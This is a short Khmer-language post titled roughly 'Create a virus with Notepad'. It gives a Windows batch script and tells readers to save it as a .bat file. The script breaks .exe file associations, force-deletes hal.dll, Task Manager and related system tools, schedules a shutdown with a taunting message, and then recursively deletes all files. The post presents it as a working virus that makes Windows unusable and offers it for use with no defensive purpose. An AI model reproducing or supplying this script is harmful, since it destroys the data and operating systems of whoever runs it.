បង្កើតមេរោគដោយ Notepad

មេរោគ នេះមានកម្លាំងខ្លាំងគួរសម ពេលដែលរត់លើវា 100% អាច ដំឡើង Windows ឡើងវិញ។
IT
លោកអ្នក Copy កូដទាំងអស់បញ្ចូលលើ Notepad រួចហើយ Save ជា​​ .bat

@Echo Off
@cls
@title Cai lai win di!
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Your computer will bye bye -s -t 06 -c " Fatal loi #1337, You DEAD!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit